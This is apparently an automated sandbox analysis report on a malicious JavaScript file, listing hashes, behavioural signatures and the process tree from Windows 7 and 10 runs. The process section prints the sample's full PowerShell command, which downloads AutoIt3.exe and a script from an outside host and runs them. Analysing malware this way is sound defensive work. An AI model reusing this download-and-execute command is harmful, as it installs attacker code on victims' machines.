Analysis
-
max time kernel
122s -
max time network
126s -
platform
windows7_x64 -
resource
win7-20231020-en -
resource tags
arch:x64arch:x86image:win7-20231020-enlocale:en-usos:windows7-x64system -
submitted
03-11-2023 17:07
Static task
static1
Behavioral task
behavioral1
Sample
TQFWEDZVXCG21sad.js
Resource
win7-20231020-en
4 signatures
150 seconds
Behavioral task
behavioral2
Sample
TQFWEDZVXCG21sad.js
Resource
win10v2004-20231023-en
10 signatures
150 seconds
General
-
Target
TQFWEDZVXCG21sad.js
-
Size
253KB
-
MD5
cb92b8b30ac17b4fcef7da73ec9cf1c8
-
SHA1
0974484ff5636d2a5f1157143dabe847f0e149f7
-
SHA256
97f40a1f53f41c5c119d2a95f45a7a02a7decbe19c540884f12aca4f485e0882
-
SHA512
6904965167da98fb9cfa3df434a2ec17e93130508700bcf516bb892740de573d11770b629b5a5adc3c5d83b67831f31194603614c324b8e7a8d4e0f90f2413f3
-
SSDEEP
6144:6e7hgXeerjqlI2Iro+2Re7hgXeerjqlI2Iro+8:6IhgSlI23rRIhgSlI23V
Score
3/10
Malware Config
Signatures
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Suspicious behavior: EnumeratesProcesses 2 IoCs
pid Process 1684 powershell.exe 1684 powershell.exe -
Suspicious use of AdjustPrivilegeToken 1 IoCs
description pid Process Token: SeDebugPrivilege 1684 powershell.exe -
Suspicious use of WriteProcessMemory 3 IoCs
description pid Process procid_target PID 1384 wrote to memory of 1684 1384 wscript.exe 28 PID 1384 wrote to memory of 1684 1384 wscript.exe 28 PID 1384 wrote to memory of 1684 1384 wscript.exe 28
Processes
-
C:\Windows\system32\wscript.exewscript.exe C:\Users\Admin\AppData\Local\Temp\TQFWEDZVXCG21sad.js1⤵
- Suspicious use of WriteProcessMemory
PID:1384 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command ni 'C:/tepp' -Type Directory -Force;cd 'C:/tepp'; Invoke-WebRequest -Uri 'http://showmoreresultonliner.com:2351' -OutFile 'AutoIt3.exe' -UserAgent 'curl/7.68.0';Invoke-WebRequest -Uri 'http://showmoreresultonliner.com:2351/msiwqueycvl' -OutFile 'wqueycvl.au3' -UserAgent 'curl/7.68.0';start 'AutoIt3.exe' -a 'wqueycvl.au3'"; Stop-Process -Name "WScript"2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1684
-